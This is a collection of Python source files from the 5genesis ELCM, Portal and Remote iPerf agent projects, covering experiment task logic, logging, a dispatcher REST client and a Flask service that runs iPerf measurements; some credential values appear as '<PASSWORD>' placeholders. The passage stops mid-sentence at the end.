self.raiseConfigError("Pattern")
if keys is None:
self.raiseConfigError("Keys")
else:
self.Log(Level.DEBUG, f"Looking for pattern: '{pattern}'; Assigning groups as:")
try:
for index, key in keys:
self.Log(Level.DEBUG, f" {index}: {key}")
except Exception as e:
raise RuntimeError(f"Invalid 'Keys' definition: {e}")
regex = re.compile(pattern)
for line in self.generator({"Path": filePath}):
match = regex.match(line)
if match:
self.Log(Level.INFO, f"Match found: {match.string}")
for index, key in keys:
self.Publish(key, match.group(index))
def generator(self, params: Dict):
raise NotImplementedError()
def raiseConfigError(self, variable: str):
raise RuntimeError(f"'{variable}' not defined, please review the Task configuration.")
class PublishFromPreviousTaskLog(PublishFromSource):
def __init__(self, logMethod, parent, params):
super().__init__("Publish From Previous Task Log", parent, params, logMethod)
def generator(self, params: Dict):
logMessages = self.parent.Params["PreviousTaskLog"]
for message in logMessages:
yield message
class PublishFromFile(PublishFromSource):
def __init__(self, logMethod, parent, params):
super().__init__("Publish From File", parent, params, logMethod)
def generator(self, params: Dict):
filePath = params["Path"]
if filePath is None:
self.raiseConfigError("Path")
with open(filePath, 'r', encoding='utf-8') as file:
for line in file:
yield line
```
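An illustrative, standalone sketch of the pattern/keys mechanism used by `PublishFromSource.Run` above; the pattern, the key indices and the log lines are hypothetical, and the real 'Keys' configuration format may differ.
```python
import re

pattern = r'Throughput: (\d+\.\d+) Mbps on cell (\w+)'
keys = [(1, 'Throughput'), (2, 'Cell')]
log_lines = [
    "Starting measurement",
    "Throughput: 94.37 Mbps on cell C01",
]

regex = re.compile(pattern)
published = {}
for line in log_lines:
    match = regex.match(line)
    if match:
        for index, key in keys:
            published[key] = match.group(index)
print(published)  # {'Throughput': '94.37', 'Cell': 'C01'}
```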
#### File: Tasks/Run/publish.py
```python
from Task import Task
from Helper import Level
from time import sleep
class Publish(Task):
def __init__(self, logMethod, parent, params):
super().__init__("Publish", parent, params, logMethod, None)
def Run(self):
for key, value in self.params.items():
self.Publish(key, value)
```
#### File: Tasks/Run/single_slice_creation_time.py
```python
from Task import Task
from Interfaces import Management
from Helper import Level
from time import sleep
from datetime import datetime
class SingleSliceCreationTime(Task):
def __init__(self, logMethod, parent, params):
super().__init__("Single Slice Creation Time Measurement", parent, params, logMethod, None)
def Run(self):
executionId = self.params['ExecutionId']
waitForRunning = self.params['WaitForRunning']
timeout = self.params.get('Timeout', None)
sliceId = self.params['SliceId']
count = 0
if waitForRunning:
self.Log(Level.INFO, f"Waiting for slice to be running. Timeout: {timeout}")
while True:
count += 1
status = Management.SliceManager().Check(sliceId).get('status', '<SliceManager check error>')
self.Log(Level.DEBUG, f'Slice {sliceId} status: {status} (retry {count})')
                # Stop when the slice is running or when the retry budget (one retry per second) is exhausted
                if status == 'Running' or (timeout is not None and count >= timeout): break
                else: sleep(1)
self.Log(Level.INFO, f"Reading deployment times for slice {sliceId}")
times = Management.SliceManager().Time(sliceId)
self.Log(Level.DEBUG, f"Received times: {times}")
self.Log(Level.INFO, f"Generating results payload")
from Helper import InfluxDb, InfluxPayload, InfluxPoint # Delayed to avoid cyclic imports
payload = InfluxPayload("Single Slice Creation Time")
payload.Tags = {'ExecutionId': str(executionId)}
point = InfluxPoint(datetime.utcnow())
for key in ["Slice_Deployment_Time", "Placement_Time", "Provisioning_Time"]:
value = times.get(key, "N/A")
if value != "N/A":
point.Fields[key] = float(value)
payload.Points.append(point)
self.Log(Level.DEBUG, f"Payload: {payload}")
self.Log(Level.INFO, f"Sending results to InfluxDb")
InfluxDb.Send(payload)
# TODO: Artificial wait until the slice is 'configured'
# TODO: In the future the slice manager should also report this status
sleep(60)
```
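A standalone sketch of the wait-until-running polling loop above, with a hypothetical `check_status` callable standing in for `Management.SliceManager().Check`; `timeout` is read as a maximum number of one-second retries.
```python
from time import sleep

def wait_for_running(check_status, slice_id, timeout=None):
    """Poll until the slice reports 'Running' or the retry budget is exhausted."""
    count = 0
    while True:
        count += 1
        status = check_status(slice_id).get('status', '<check error>')
        if status == 'Running':
            return True
        if timeout is not None and count >= timeout:
            return False
        sleep(1)

# Stub that reports 'Running' on the third poll
responses = iter([{'status': 'Instantiating'}, {'status': 'Instantiating'}, {'status': 'Running'}])
print(wait_for_running(lambda _id: next(responses), 'slice-1', timeout=10))  # True
```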
#### File: ELCM/Experiment/execution_tombstone.py
```python
from Helper import Serialize
from Executor import Executor
from .experiment_run import CoarseStatus
class Tombstone:
def __init__(self, id: str):
path = Serialize.Path('Execution', id)
data = Serialize.Load(path)
self.Id, self.Cancelled, status = Serialize.Unroll(data, 'Id', 'Cancelled', 'CoarseStatus')
self.Params = {'Id': self.Id, 'Deserialized': True}
self.CoarseStatus = CoarseStatus[status]
self.PreRunner = Executor.Load('PreRunner', str(self.Id))
self.Executor = Executor.Load('Executor', str(self.Id))
self.PostRunner = Executor.Load('PostRunner', str(self.Id))
self.Created = Serialize.StringToDate(data['Created'])
self.JsonDescriptor = data.get('JsonDescriptor', {})
self.Milestones = data.get('Milestones', [])
self.RemoteId = data.get('RemoteId', None)
```
#### File: ELCM/Experiment/variable_expander.py
```python
from typing import Dict, Union
from .experiment_run import ExperimentRun
from Executor import ExecutorBase
from re import finditer
from Helper import Config
from json import dumps
class Expander:
@classmethod
def ExpandDict(cls, dict: Dict, context: Union[ExecutorBase, ExperimentRun]):
config = Config()
return cls.expandParams(dict, context, config)
@classmethod
def expandParams(cls, item: object, context: Union[ExecutorBase, ExperimentRun], config: Config) -> object:
if isinstance(item, dict):
res = {}
for key, value in item.items():
res[key] = cls.expandParams(value, context, config)
elif isinstance(item, list) or isinstance(item, tuple):
res = []
for value in item:
res.append(cls.expandParams(value, context, config))
elif isinstance(item, str):
res = cls.expand(item, context, config)
else:
res = item
return res
@classmethod
def expand(cls, item: str, context: Union[ExecutorBase, ExperimentRun], config: Config) -> str:
duration = context.Descriptor.Duration or 0
replacements = {
# Dynamic values
"@{TempFolder}": context.TempFolder,
"@{ExecutionId}": context.ExecutionId,
"@{SliceId}": context.Params.get("SliceId", "None"),
"@{Application}": context.Descriptor.Application,
"@{JSONParameters}": dumps(context.Descriptor.Parameters, indent=None),
"@{ReservationTime}": duration,
"@{ReservationTimeSeconds}": duration * 60,
# Configuration values
"@{TapFolder}": config.Tap.Folder,
"@{TapResults}": config.Tap.Results,
}
expanded = item
for key, value in replacements.items():
expanded = expanded.replace(key, str(value))
# Expand custom values published by Run.Publish and parameters
        for match in finditer(r'@\[(.*?)]', item):
all = match.group()
capture = match.groups()[0]
if ':' in capture:
key, default = capture.split(':')
else:
key = capture
default = '<<UNDEFINED>>'
collection = None
group = None
if '.' in key:
group, key = key.split('.')
if group == "Params":
collection = context.Descriptor.Parameters
elif group == "Publish":
collection = context.params
else:
collection = context.params
value = collection.get(key, default) if collection is not None else f'<<UNKNOWN GROUP {group}>>'
expanded = expanded.replace(all, str(value))
return expanded
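# Illustrative example (not part of the original module): assuming a context where
# context.Descriptor.Parameters == {'Iterations': 5} and context.Params contains
# {'SliceId': 'abc'}, the string
#   "Run @[Params.Iterations:1] runs on slice @{SliceId} (@[Publish.Missing:none])"
# expands to "Run 5 runs on slice abc (none)": '@{...}' placeholders come from the fixed
# replacements table, while '@[Group.key:default]' reads the Params/Publish collections
# and falls back to the default given after the colon.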
``` |
{
"source": "5genesis/Portal",
"score": 2
} |
#### File: Portal/Helper/action_handler.py
```python
from .child import Child
from typing import Dict, Optional
from config import Config
from os.path import join, abspath, exists
from os import remove
class Action(Child):
def __init__(self, service, type: str, vnfd, token):
super().__init__(f"{service.id}_{type}")
self.service = service # type: "NetworkService"
self.type = type
self.vnfd = vnfd # type: "VnfdPackage"
self.token = token
self.message = "Init"
self.result = None
def Run(self):
try:
handler = getattr(self, self.type)
handler()
except Exception as e:
self.hasFailed = True
self.message = f"Error: {e}"
def onboardVim(self):
from REST import DispatcherApi
filePath = abspath(join(Config.UPLOAD_FOLDER, *self.service.VimLocalPath, self.service.vim_image))
vimName = self.service.vim_name
self.message = f"VIM Image onboarding in progress"
maybeError = DispatcherApi().OnboardVim(filePath, vimName, self.token, self.service.is_public)
if maybeError is None:
self.result = "<onboarded>" # Not a known ID but a value to signal it's been onboarded
self.message = f"VIM Image successfully onboarded"
else:
raise RuntimeError(f"Exception during onboarding process: {maybeError}")
def onboardNsd(self):
from REST import DispatcherApi
filePath = abspath(join(Config.UPLOAD_FOLDER, *self.service.NsdLocalPath, self.service.nsd_file))
self.message = f"NSD file onboarding in progress"
maybeId, success = DispatcherApi().OnboardNsd(filePath, self.token, self.service.is_public)
if success:
self.result = maybeId
self.message = f"NSD file successfully onboarded"
else:
raise RuntimeError(f"Exception during onboarding process: {maybeId}")
def onboardVnf(self):
from REST import DispatcherApi
filePath = abspath(join(Config.UPLOAD_FOLDER, *self.vnfd.VnfdLocalPath, self.vnfd.vnfd_file))
self.message = f"VNFD package onboarding in progress"
maybeId, success = DispatcherApi().OnboardVnfd(filePath, self.token, self.service.is_public)
if success:
self.result = maybeId
self.message = f"Onboarded VNFD with id: {maybeId}"
else:
raise RuntimeError(f"Exception during onboarding process: {maybeId}")
def deleteVim(self):
if self.service.vim_id is not None:
self.message = "Deletion of onboarded VIM images is not supported"
else:
self.message = "Deleting VIM image"
self._deleteLocalFile(self.service.VimLocalPath, self.service.vim_image)
self.message = "Deleted VIM image from temporal storage"
def deleteNsd(self):
if self.service.nsd_id is not None:
self.message = "Deletion of onboarded NSD is not supported"
else:
self.message = "Deleting NSD file"
self._deleteLocalFile(self.service.NsdLocalPath, self.service.nsd_file)
self.message = "Deleted NSD file from temporal storage"
def deleteVnf(self):
if self.vnfd.vnfd_id is not None:
self.message = "Deletion of onboarded VNFDs is not supported"
else:
self.message = "Deleting VNFD package"
self._deleteLocalFile(self.vnfd.VnfdLocalPath, self.vnfd.vnfd_file)
self.message = "Deleted VNFD package file from temporal storage"
def _deleteLocalFile(self, path, file):
filePath = abspath(join(Config.UPLOAD_FOLDER, *path, file))
if exists(filePath):
remove(filePath)
def __str__(self):
return f"Action: {self.name} (St:{self.hasStarted}, Ed:{self.hasFinished}, Fail:{self.hasFailed})"
class ActionHandler:
collection: Dict[int, Action] = {}
@classmethod
def Get(cls, id: int) -> Optional[Action]:
return cls.collection.get(id, None)
@classmethod
def Set(cls, id: int, action: Action) -> None:
if id in cls.collection.keys():
from .log import Log
Log.W(f"Adding duplicated key to active Actions ({id}), overwritting existing: {cls.collection[id]}")
cls.collection[id] = action
@classmethod
def Delete(cls, id: int) -> None:
_ = cls.collection.pop(id)
```
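A minimal sketch of the class-level registry above; `_DummyAction` is a hypothetical stand-in, since building a real `Action` requires a NetworkService, a VnfdPackage and a token.
```python
class _DummyAction:
    def __str__(self):
        return "Action: dummy (St:False, Ed:False, Fail:False)"

ActionHandler.Set(1, _DummyAction())  # register an action under id 1
print(ActionHandler.Get(1))           # -> the dummy action
ActionHandler.Delete(1)               # remove it again
print(ActionHandler.Get(1))           # -> None once deleted
```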
#### File: Portal/Helper/log.py
```python
import logging
import traceback
from enum import Enum, unique
from dataclasses import dataclass
from typing import Union, List, Dict, Tuple
from flask import Flask
from os import makedirs
from os.path import exists, join
from logging.handlers import RotatingFileHandler
from .config import Config
import sys
class ColoredFormatter(logging.Formatter):
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
RESET_SEQ = '\033[0m'
COLOR_SEQ = '\033[1;%dm'
COLORS = {
'WARNING': YELLOW,
'INFO': WHITE,
'DEBUG': BLUE,
'ERROR': RED,
'CRITICAL': MAGENTA
}
def format(self, record):
if record.levelname in self.COLORS:
color_levelname = self.COLOR_SEQ \
% (30 + self.COLORS[record.levelname]) \
+ record.levelname \
+ self.RESET_SEQ
record.levelname = color_levelname
return logging.Formatter.format(self, record)
@unique
class Level(Enum):
DEBUG, INFO, WARNING, ERROR, CRITICAL = range(5)
@dataclass
class LogInfo:
Log: List[Tuple[str, str]] = None
Count: Dict[str, int] = None
def __init__(self, dictionary):
self.Log = dictionary["Log"]
self.Count = dictionary["Count"]
@staticmethod
def Empty():
return {
"Count": {"Debug": 0, "Info": 0, "Warning": 0, "Error": 0, "Critical": 0},
"Log": []
}
class Log:
CONSOLE_FORMAT = '%(asctime)s %(levelname)s: %(message)s'
FILE_FORMAT = '%(asctime)s - %(levelname)s - %(message)s'
# Rotating log files configuration
LOG_SIZE = 16777216
LOG_COUNT = 10
initialized = False
app: Flask = None
@classmethod
def Initialize(cls, app: Flask):
config = Config()
folder = config.Logging.Folder
if not exists(folder): makedirs(folder)
# Accept all messages on Flask logger, but display only up to the selected level
app.logger.setLevel(logging.DEBUG)
console_handler: logging.StreamHandler = app.logger.handlers[0]
console_handler.setLevel(config.Logging.AppLevel)
console_handler.setFormatter(ColoredFormatter(cls.CONSOLE_FORMAT))
# Attach new file handler
file_handler = RotatingFileHandler(
join(folder, 'Portal.log'), maxBytes=cls.LOG_SIZE, backupCount=cls.LOG_COUNT)
file_handler.setFormatter(logging.Formatter(cls.FILE_FORMAT))
file_handler.setLevel(config.Logging.LogLevel)
app.logger.addHandler(file_handler)
# Put console logger at the end (to avoid saving _colors_ to file)
app.logger.handlers.reverse()
cls.app = app
cls.initialized = True
@classmethod
def _dump(cls, level: str, msg: str):
if cls.initialized:
log = cls.app.logger
method = getattr(log, level.lower())
method(msg)
else:
print(f"[Log not initialized][{level}] {msg}")
@classmethod
def D(cls, msg):
cls._dump('DEBUG', msg)
@classmethod
def I(cls, msg):
cls._dump('INFO', msg)
@classmethod
def W(cls, msg):
cls._dump('WARNING', msg)
@classmethod
def E(cls, msg):
cls._dump('ERROR', msg)
@classmethod
def C(cls, msg):
cls._dump('CRITICAL', msg)
@staticmethod
def State(condition: bool) -> str:
return f'{"En" if condition else "Dis"}abled'
@classmethod
def Log(cls, level: Union[Level, str], msg: str):
if isinstance(level, str):
level = Level[level]
if level == Level.DEBUG: cls.D(msg)
if level == Level.INFO: cls.I(msg)
if level == Level.WARNING: cls.W(msg)
if level == Level.ERROR: cls.E(msg)
if level == Level.CRITICAL: cls.C(msg)
@classmethod
def GetTraceback(cls):
exc_type, exc_value, exc_traceback = sys.exc_info()
return traceback.format_exception(exc_type, exc_value, exc_traceback)
@classmethod
def Traceback(cls):
lines = cls.GetTraceback()
for line in lines:
Log.D(line)
```
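A minimal standalone sketch showing the `ColoredFormatter` above attached to a plain stdlib logger outside of Flask; it assumes a terminal that renders ANSI color codes.
```python
import logging

handler = logging.StreamHandler()
handler.setFormatter(ColoredFormatter('%(asctime)s %(levelname)s: %(message)s'))

logger = logging.getLogger("portal-demo")
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)

logger.debug("debug message")
logger.warning("warning message")
logger.error("error message")
```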
#### File: migrations/versions/56345866eed9_record_vim_name_on_network_service.py
```python
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '56345866eed9'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('network_service', sa.Column('vim_name', sa.String(length=64), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('network_service', 'vim_name')
# ### end Alembic commands ###
```
#### File: 5genesis/Portal/portal.py
```python
from typing import Dict
from app import create_app, db
from app.models import User, Experiment, Execution, Action
from Helper import Config, Facility, Log
app = create_app()
config = Config()
@app.shell_context_processor
def make_shell_context() -> Dict:
return {'DB': db, 'User': User, 'Experiment': Experiment,
'Execution': Execution, 'Action': Action,
'Config': config, 'Facility': Facility}
```
#### File: Portal/REST/dispatcherApi.py
```python
import json
from typing import Dict, Tuple, Optional, List
from app.models import User, Experiment
from .restClient import RestClient, Payload
from base64 import b64encode
from Helper import Config, Log, LogInfo
from app import db
from datetime import datetime, timezone
from os.path import split
class VimInfo:
def __init__(self, data):
self.Name = data['name']
self.Type = data['type']
self.Location = data['location']
def __str__(self):
return f'{self.Name} ({self.Type} - {self.Location})'
class DispatcherApi(RestClient):
def __init__(self):
config = Config().Dispatcher
super().__init__(config.Host, config.Port, "", https=True, insecure=True)
self.tokenExpiry = config.TokenExpiry
@staticmethod
def basicAuthHeader(user: str, password: str) -> Dict:
encoded = b64encode(bytes(f'{user}:{password}'.encode('ascii')))
return {'Authorization': f'Basic {encoded.decode("ascii")}'}
@staticmethod
def bearerAuthHeader(token: str) -> Dict:
return {'Authorization': f'Bearer {token}'}
def Register(self, user: User) -> Tuple[str, bool]:
""" Returns (<message>, <success>). """
url = '/auth/register'
data = {
'username': user.username,
'email': user.email,
'password': <PASSWORD>
}
try:
response = self.HttpPost(url, body=data, payload=Payload.Form)
status = self.ResponseStatusCode(response)
if status in [400, 200]:
message = self.ResponseToJson(response)['result']
return message, (status == 200)
else:
raise Exception(f"Status {status} ({response.reason})")
except Exception as e:
return f"Exception while accessing authentication: {e}", False
def GetToken(self, user: User) -> Tuple[str, bool]:
"""
Return a tuple (str, bool). The string contains the token OR the
error message, the boolean indicates success.
"""
url = '/auth/get_token'
try:
response = self.HttpGet(url, extra_headers=self.basicAuthHeader(user.username, user.password_hash))
status = self.ResponseStatusCode(response)
if status in [400, 200]:
result = self.ResponseToJson(response)['result']
return result, (status == 200)
else:
raise Exception(f"Status {status} ({response.reason})")
except Exception as e:
message = f"Error while retrieving token: {e}"
Log.E(message)
return message, False
def RenewUserToken(self, user: User) -> Optional[str]:
"""Returns None if no error, an error message otherwise"""
token, success = self.GetToken(user)
user.token = token if success else None
user.tokenTimestamp = datetime.now(timezone.utc) if success else None
db.session.add(user)
db.session.commit()
return token if not success else None
def RenewUserTokenIfExpired(self, user) -> Optional[str]:
"""Returns None if no error, an error message otherwise"""
tokenTimestamp = user.tokenTimestamp if user.tokenTimestamp is not None else datetime.min
tokenTimestamp = tokenTimestamp.replace(tzinfo=timezone.utc)
timespan = datetime.now(timezone.utc) - tokenTimestamp
if timespan.total_seconds() >= self.tokenExpiry:
return self.RenewUserToken(user)
else:
return None
def RunCampaign(self, experimentId: int, user: User) -> Dict:
maybeError = self.RenewUserTokenIfExpired(user)
if maybeError is not None:
return {"ExecutionId": None, "Success": False, "Message": maybeError}
token = user.CurrentDispatcherToken
descriptor = json.dumps(Experiment.query.get(experimentId).serialization())
url = f'/elcm/api/v0/run'
response = self.HttpPost(url, {'Content-Type': 'application/json', **self.bearerAuthHeader(token)}, descriptor)
status = RestClient.ResponseStatusCode(response)
if status != 200:
return {"ExecutionId": None, "Success": False,
"Message": f"Execution request failed with status {status}"}
else:
response = RestClient.ResponseToJson(response)
response.update({"Success": True, "Message": "No error"})
return response
def GetExecutionLogs(self, executionId: int, user: User) -> Dict:
maybeError = self.RenewUserTokenIfExpired(user)
if maybeError is not None:
empty = LogInfo.Empty()
return {'PreRun': empty, 'Executor': empty, 'PostRun': empty, 'Status': maybeError}
token = user.CurrentDispatcherToken
url = f'/elcmexecution/{executionId}/logs'
response = self.HttpGet(url, extra_headers=self.bearerAuthHeader(token))
return RestClient.ResponseToJson(response)
def basicGet(self, user: User, url: str, kind: str) -> Tuple[object, Optional[str]]:
try:
maybeError = self.RenewUserTokenIfExpired(user)
if maybeError is not None:
return {}, maybeError
token = user.CurrentDispatcherToken
response = self.HttpGet(url, extra_headers=self.bearerAuthHeader(token))
return self.ResponseToJson(response), None
except Exception as e:
return {}, f"Exception while retrieving list of {kind}: {e}"
def GetVimLocations(self, user: User) -> Tuple[List[VimInfo], Optional[str]]:
data, error = self.basicGet(user, '/mano/vims', 'VIMs') # type: List, Optional[str]
return [VimInfo(vim) for vim in data] if error is None else [], error
def GetVimLocationImages(self, user: User, vim_name: str) -> Tuple[List[VimInfo], Optional[str]]:
data, error = self.basicGet(user, '/mano/image', f"images for VIM '{vim_name}'") # type: Dict, Optional[str]
return data.get(vim_name, []) if error is None else [], error
def GetAvailableVnfds(self, user: User) -> Tuple[List[str], Optional[str]]:
data, error = self.basicGet(user, '/mano/vnfd', f"VNFDs") # type: Dict, Optional[str]
return data if error is None else [], error
def GetAvailableNsds(self, user: User) -> Tuple[List[str], Optional[str]]:
data, error = self.basicGet(user, '/mano/nsd', f"NSDs") # type: Dict, Optional[str]
return data if error is None else [], error
def handleErrorcodes(self, code: int, data: Dict, overrides: Dict[int, str] = None) -> str:
defaults = {
400: "Invalid Input",
401: "Invalid permission",
404: "Not found",
406: "File not valid",
409: "Conflict",
413: "File too large",
422: "Unprocessable entity",
500: "Internal server error" # Or an unknown error code
}
overrides = {} if overrides is None else overrides
error = overrides.get(code, defaults.get(code, defaults[500]))
if code in [400, 404, 409, 422]:
extra = f" (Status: {data['status']}, Code: {data['code']}, Detail: {data['detail']})"
elif code == 401:
extra = ""
else:
extra = f" (Code {code})"
return error + extra
def OnboardVnfd(self, path: str, token: str, visibility: bool) -> Tuple[str, bool]:
"""Returns a pair of str (id or error message) and bool (success)"""
url = '/mano/vnfd'
overrides = {409: "Conflict - VNFD already present"}
return self._onboardVnfdOrNsd(url, path, token, 'VNFs', overrides, visibility)
def OnboardNsd(self, path: str, token: str, visibility: bool) -> Tuple[str, bool]:
"""Returns a pair of str (id or error message) and bool (success)"""
url = '/mano/nsd'
overrides = {409: "Conflict - NSD already present"}
return self._onboardVnfdOrNsd(url, path, token, "NSs", overrides, visibility)
def _onboardVnfdOrNsd(self, url: str, path: str, token: str, dictId: str, overrides: Dict, visibility: bool):
with open(path, "br") as file:
data = {'visibility': str(visibility).lower()}
response = self.HttpPost(url, extra_headers=self.bearerAuthHeader(token), files={'file': file},
body=data, payload=Payload.Form)
code = self.ResponseStatusCode(response)
data = self.ResponseToJson(response)
if code == 200:
try:
return list(data[dictId].keys())[0], True
except (KeyError, IndexError, AttributeError):
return split(path)[1], True
elif code == 400:
try:
return data['error'], False
except KeyError:
return str(data), False
else:
return self.handleErrorcodes(code, data, overrides), False
def OnboardVim(self, path: str, vimName: str, token: str, visibility: str) -> Optional[str]:
"""Returns an error message, or None on success"""
with open(path, "br") as file:
containerFormat = "bare"
data = {'vim_id': vimName, 'container_format': containerFormat,
'visibility': str(visibility).lower()}
response = self.HttpPost('/mano/image', extra_headers=self.bearerAuthHeader(token),
body=data, files={'file': file}, payload=Payload.Form)
code = self.ResponseStatusCode(response)
if 200 <= code <= 299:
return None
else:
try:
data = self.ResponseToJson(response)
return data.get('detail', data.get('result', f'Unknown error. Status code: {code}'))
except Exception as e:
raise Exception(f"Unknown exception '{e}'. Status code: {code}")
``` |
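A minimal standalone sketch of the token request that `DispatcherApi.GetToken()` performs, calling the dispatcher's `/auth/get_token` endpoint directly with `requests`. The host, port and credentials are placeholders, and `verify=False` mirrors the insecure-HTTPS flag used when the client above is constructed.
```python
import requests
from base64 import b64encode

def basic_auth_header(user: str, password: str) -> dict:
    encoded = b64encode(f'{user}:{password}'.encode('ascii')).decode('ascii')
    return {'Authorization': f'Basic {encoded}'}

host, port = 'dispatcher.example.com', 8082   # placeholder values
response = requests.get(f'https://{host}:{port}/auth/get_token',
                        headers=basic_auth_header('alice', 'secret'),
                        verify=False)
print(response.status_code, response.json().get('result'))
```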
{
"source": "5genesis/Remote_iPerf_agent",
"score": 2
} |
#### File: 5genesis/Remote_iPerf_agent/app.py
```python
import os
import yaml
from flask import Flask, jsonify, request
from iperfExecutor import iPerf
from iperfExecutor.iperfConfig import iPerfConfig
app = Flask(__name__)
THIS_FOLDER = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(THIS_FOLDER, 'config.yml'), 'r', encoding='utf-8') as file:
data = yaml.safe_load(file)
iPerf.Initialize(data['IPERF_PATH'])
def errorResponse(message, error):
print(f'{message}: {error}')
return jsonify({'Status': 'Error', 'Message': message, 'Error': f'{error}'}), 403
@app.route('/Iperf', methods=['POST'])
@app.route('/Iperf/<pathParameters>', methods=['GET'])
def Iperf(pathParameters: str = ""):
mode = 'server'
try:
if request.method == 'POST':
jsonBody = str(request.json)
parameters = jsonBody[1:-1].replace('\'', '').split(',')
else:
if iPerfConfig.formatValidation(pathParameters):
parameters = pathParameters[1:-1].split(',')
else:
return errorResponse('Error executing iPerf', 'Wrong parameter format')
for param in parameters:
if '-c' in param:
mode = "client"
break
iPerf.Iperf(parameters)
return jsonify({'Status': 'Success', 'Message': f'Successfully executed iPerf {mode}'})
except Exception as error:
return errorResponse(f'Error executing iPerf {mode}', error)
@app.route('/Close', methods=['GET'])
def Close():
try:
iPerf.Close()
return jsonify({'Status': 'Success', 'Message': 'Successfully closed iPerf'})
except Exception as error:
return errorResponse('Error closing iPerf', error)
@app.route('/LastRawResult', methods=['GET'])
def LastRawResult():
try:
return jsonify({'Status': 'Success', 'Message': 'Successfully retrieved last raw result',
'Result': iPerf.LastRawResult()})
except Exception as error:
return errorResponse('Error retrieving last raw result', error)
@app.route('/LastJsonResult', methods=['GET'])
def LastJsonResult():
try:
return jsonify({'Status': 'Success', 'Message': 'Successfully retrieved last json result',
'Result': iPerf.LastJsonResult()})
except Exception as error:
return errorResponse('Error retrieving last json result', error)
@app.route('/LastError', methods=['GET'])
def LastError():
try:
return jsonify({'Status': 'Success', 'Message': 'Successfully retrieved last error',
'Error': iPerf.LastError()})
except Exception as error:
return errorResponse('Error retrieving last error', error)
@app.route('/StartDateTime', methods=['GET'])
def StartDateTime():
return jsonify({'Status': 'Success', 'Message': f'Start date time {iPerf.StartDateTime()}'})
@app.route('/IsRunning', methods=['GET'])
def IsRunning():
return jsonify({'Status': 'Success', 'Message': f'iPerf is running: {iPerf.IsRunning()}'})
if __name__ == '__main__':
app.run()
```
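A hypothetical client for the agent above. The list-style request body is an assumption about the format expected by `iPerfConfig.parseParameters`, which is not included in this dump; the agent address uses Flask's default development port.
```python
import requests

agent = 'http://127.0.0.1:5000'   # placeholder address of the agent

# Start an iPerf client run towards a hypothetical server for 10 seconds.
print(requests.post(f'{agent}/Iperf', json=['-c', '192.168.1.100', '-t', '10']).json())

# Once the run has finished, fetch the parsed results and the raw output.
print(requests.get(f'{agent}/LastJsonResult').json())
print(requests.get(f'{agent}/LastRawResult').json())
```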
#### File: Remote_iPerf_agent/iperfExecutor/iperfExecutor.py
```python
import os
import signal
import subprocess
from typing import List, Dict
from datetime import datetime, timezone
from threading import Thread
from iperfExecutor.iperfConfig import iPerfConfig
class iPerf:
isRunning = False
executable: str = None
rawResult: List[str] = []
jsonResult: List[Dict] = []
error: List[str] = []
startTime: datetime = None
isServer = False
processPID: int = -1
@classmethod
def Initialize(cls, executable: str):
cls.executable = executable
@classmethod
def Iperf(cls, parameters: List[str]):
params = iPerfConfig.parseParameters(parameters)
return cls.execute(params)
@classmethod
def Close(cls):
if not cls.isRunning or cls.processPID == -1:
raise RuntimeError('iPerf is not running')
os.kill(cls.processPID, signal.SIGTERM)
cls.processPID = -1
cls.isRunning = False
return 1
@classmethod
def LastRawResult(cls):
if cls.isRunning:
raise RuntimeError("iPerf is still running")
print(f'Last Raw Result: {cls.rawResult}')
return cls.rawResult
@classmethod
def LastJsonResult(cls):
if cls.isRunning:
raise RuntimeError("iPerf is still running")
print(f'Last Json Result: {cls.jsonResult}')
return cls.jsonResult
@classmethod
def LastError(cls):
if cls.isRunning:
raise RuntimeError("iPerf is still running")
print(f'Last Error: {cls.error}')
return cls.error
@classmethod
def StartDateTime(cls):
print(f'Start Date Time: {cls.startTime}')
return cls.startTime
@classmethod
def IsRunning(cls):
print(f'Is Running: {cls.isRunning}')
return cls.isRunning
@classmethod
def execute(cls, parametersDict: Dict) -> None:
if cls.executable is None:
raise RuntimeError('Running iPerf without executable')
if cls.isRunning:
raise RuntimeError('iPerf already running')
# Shorten long parameters format
parametersDict = iPerfConfig.shortenParameters(parametersDict)
# Force format to Mbits/sec and interval to 1s if not present
parametersDict['-f'] = 'm'
if '-i' not in parametersDict.keys():
parametersDict['-i'] = '1'
interval = int(parametersDict['-i'])
if '-u' in parametersDict.keys() or '-U' in parametersDict.keys():
protocol = 'UDP'
else:
protocol = 'TCP'
if '-P' in parametersDict.keys():
# 'P' parameter must be after client host and port, move it to the last key
parallelCount = int(parametersDict.pop('-P'))
parametersDict['-P'] = str(parallelCount)
# Even if 'P' is set, iPerf will ignore it when < 2
parallelEnabled = (parallelCount > 1)
else:
parallelCount = 1
parallelEnabled = False
parameters = []
for key, value in parametersDict.items():
parameters.append(key)
if len(value) != 0:
parameters.append(value)
params = [cls.executable, *parameters]
print(f'Final CLI parameters: {params}')
print(f'Protocol: {protocol}; Parallel: {parallelEnabled} (Count: {parallelCount}); Interval: {interval}')
Thread(target=cls.async_task, args=(params, protocol, parallelEnabled, interval)).start()
return None
@classmethod
def stdout(cls, process: subprocess.Popen, protocol: str, parallelEnabled: bool, interval: int):
pipe = process.stdout
for line in iter(pipe.readline, b''):
try:
line = line.decode('utf-8').rstrip()
except Exception as e:
line = f'DECODING EXCEPTION: {e}'
if 'error' in line or 'failed' in line:
cls.error.append(line)
parse = iPerfConfig.parseIperfResult(line, protocol, parallelEnabled, cls.startTime, interval)
if parse:
cls.rawResult.append(line)
cls.jsonResult.append(parse)
@classmethod
def async_task(cls, params: List[str], protocol: str, parallelEnabled: bool, interval: int):
cls.isRunning = True
cls.rawResult = []
cls.jsonResult = []
cls.error = []
cls.startTime = datetime.now(timezone.utc)
try:
process = subprocess.Popen(params, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
cls.processPID = process.pid
if '-c' in params:
cls.isServer = False
print('Client running')
else:
cls.isServer = True
print('Server running')
cls.stdout(process, protocol, parallelEnabled, interval)
process.wait()
except Exception as e:
print(f'Error in process: {e}')
finally:
cls.isRunning = False
if not cls.isServer:
print('Client finished')
else:
print('Server finished')
``` |
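The `execute()` method above flattens the parameter dictionary into a flat CLI argument list. The following standalone snippet reproduces that step with an illustrative dictionary (keys with empty values are emitted as bare flags):
```python
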